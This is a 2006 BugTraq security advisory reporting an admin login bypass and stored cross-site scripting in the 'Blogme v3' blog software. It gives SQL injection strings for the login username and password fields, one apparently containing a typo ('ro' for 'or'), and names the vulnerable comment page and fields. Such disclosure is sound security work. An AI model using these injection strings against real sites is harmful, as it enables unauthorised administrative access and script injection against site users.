BugTraq
Blogme v3 [admin login bypass & xss (post)] Nov 14 2006 03:27PM
saps audit gmail com
vendor site:http://www.drumster.net/
product:Blogme v3
bug:login bypass & xss (post)
risk:high

admin login bypass :
user : ' or '1' = '1
passwd: 1'='1' ro '

xss post :
in: /comments.asp?blog=85
vulnerables fields:
- Name
- URL
- Comments

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus